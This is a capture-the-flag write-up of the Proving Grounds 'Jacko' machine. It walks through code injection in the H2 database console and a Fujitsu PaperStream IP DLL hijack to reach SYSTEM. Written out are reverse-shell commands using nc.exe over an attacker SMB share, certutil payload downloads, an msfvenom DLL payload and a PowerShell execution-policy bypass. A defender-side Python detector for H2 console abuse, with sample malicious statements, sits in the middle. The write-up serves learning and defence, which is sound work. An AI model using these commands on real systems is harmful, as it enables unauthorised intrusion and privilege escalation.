PG Practice Jacko writeup
```
sudo nmap 192.168.67.66 -p- -sS -sV
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
7680/tcp open  pando-pub?
8082/tcp open  http          H2 database http console
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
On port 8082 there is a login page for the H2 Console. Connecting with the pre-filled default values logs us into the console.
Once logged in we can see that the target is running H2 Console version 1.4.199. A search on exploit-db shows that version 1.4.199 is vulnerable to code injection through Java: anyone who can submit SQL to the console can define an alias backed by Java code and then call it.
{% embed url="https://www.exploit-db.com/exploits/49384" %}
The following snippet, taken from the exploit-db entry, is the exploit code we need to run in the H2 Console. Only the part that executes commands on the target machine is shown below. To achieve code execution I set up an SMB server on my attacking machine with Impacket's smbserver.py script and made sure nc.exe was in the shared directory.

```sql
-- Evaluate script
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c //192.168.49.67/Share/nc.exe -e cmd.exe 192.168.49.67 8082").getInputStream()).useDelimiter("\Z").next()');
```
First set up the SMB server:

```
python2 smbserver.py -smb2support Share /home/kali/
```

Then paste the code from exploit-db into the SQL statement box of the console and make sure the "Evaluate script" section contains the command that runs nc.exe from the attacking machine's SMB share. When ready, run the SQL statement; we should see an authentication attempt on smbserver.py and shortly afterwards catch a reverse shell on our netcat listener.
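As an added, defender-side example that is not part of the original writeup or the exploit-db entry: the console-side pattern above (a CREATE ALIAS bound to Java, then a CALL that reaches Runtime.exec and pulls a binary from a remote share) is straightforward to flag in an H2 statement history or query log. The statement history below is constructed, and treating the log as one SQL statement per line is an assumption, since H2's own trace format is not shown on this page.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Patterns that mark an H2 statement as reaching for the JVM rather than the data.
ALIAS_DEF = re.compile(r"\bCREATE\s+ALIAS\b", re.IGNORECASE)
# Alias bound to Java: inline source ($$ ... $$) or a FOR "class.method" binding.
JAVA_BOUND = re.compile(r'\$\$|\bFOR\s+"[\w.$]+"', re.IGNORECASE)
PROCESS_EXEC = re.compile(r"Runtime\.getRuntime\(\)\.exec|ProcessBuilder|ScriptEngineManager", re.IGNORECASE)
# UNC path to an IP-addressed host (\\1.2.3.4\share or //1.2.3.4/share), as used to fetch nc.exe above.
REMOTE_SHARE = re.compile(r"(?:\\\\|//)(?:\d{1,3}\.){3}\d{1,3}[/\\]")

@dataclass
class Finding:
    line_no: int
    reasons: list[str]
    statement: str

def score_statement(stmt: str) -> list[str]:
    """Return the reasons one SQL statement looks like console abuse (empty list if benign)."""
    reasons: list[str] = []
    if ALIAS_DEF.search(stmt):
        reasons.append("CREATE ALIAS")
        if JAVA_BOUND.search(stmt):
            reasons.append("alias bound to Java code")
    if PROCESS_EXEC.search(stmt):
        reasons.append("process execution from SQL")
    if REMOTE_SHARE.search(stmt):
        reasons.append("remote share referenced")
    return reasons

def scan_statements(statements: list[str]) -> list[Finding]:
    """Run score_statement over a statement history and keep only the flagged entries."""
    findings = []
    for line_no, stmt in enumerate(statements, start=1):
        reasons = score_statement(stmt)
        if reasons:
            findings.append(Finding(line_no, reasons, stmt))
    return findings

# Constructed sample history: benign queries around the alias definition and the call
# in the shape of the exploit above (host and binary name replaced with placeholders).
SAMPLE_HISTORY = [
    "SELECT * FROM INFORMATION_SCHEMA.USERS",
    "CREATE TABLE invoices(id INT PRIMARY KEY, total DECIMAL)",
    'CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"',
    "CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime()"
    ".exec(\"cmd.exe /c //10.0.0.5/Share/tool.exe\").getInputStream()).useDelimiter(\"\\\\Z\").next()')",
    "SELECT COUNT(*) FROM invoices WHERE total > 100",
]

if __name__ == "__main__":
    for f in scan_statements(SAMPLE_HISTORY):
        print(f"statement {f.line_no}: {', '.join(f.reasons)}\n    {f.statement}")
```

The same two signals (an alias bound to Java and a call that spawns a process) are also the ones to alert on from H2's side, since a console that only ever serves data has no reason to emit either.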
Once in the shell, we first need to fix the PATH on the target machine, as shown below:

```
set PATH=%SystemRoot%\system32;%SystemRoot%;
```
Looking through Program Files (x86) we can see a directory called PAPERSTREAM IP. Searching for exploits on exploit-db takes us to the following:
{% embed url="https://www.exploit-db.com/exploits/49382" %}
The description of this exploit is shown below:
A DLL hijack vulnerability exists in the FJTWSVIC service running as part of the Fujitsu PaperStream IP (TWAIN) software package. This exploit searches for a writable location, copies the specified DLL to that location and then triggers the DLL load by sending a message to FJTWSVIC over the FjtwMkic_Fjicube_32 named pipe.
```powershell
# Example payload generated as follows
# msfvenom -p windows/x64/shell_reverse_tcp -f dll -o shell.dll LHOST=eth0 LPORT=4444
$PayloadFile = "C:\Windows\Temp\UninOldIS.dll"
```
We need to change the DLL name generated by msfvenom and the payload location. When I attempted to download the exploit to c:\windows\temp my file was deleted instantly. Possibly by AV?
First I generated an msfvenom reverse shell with the name of the required DLL, UninOldIS.dll:

```
msfvenom -p windows/shell_reverse_tcp -f dll -o UninOldIS.dll LHOST=192.168.49.67 LPORT=8082
```
Then I changed the payload file variable to the user's Desktop.
At this point move into the user's Desktop and use certutil to download the files, as when copying by SMB I could get the payload to trigger without issues.

```
certutil -urlcache -split -f http://192.168.49.67/exploit.ps1 exploit.ps1
certutil -urlcache -split -f http://192.168.49.67/UninOldIS.dll UninOldIS.dll
```
Start a netcat listener on the attacking machine on port 8082, then execute the PowerShell script exploit.ps1 on the target machine:

```
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\users\tony\Desktop\exploit.ps1
```

A short while later we should receive a shell as SYSTEM.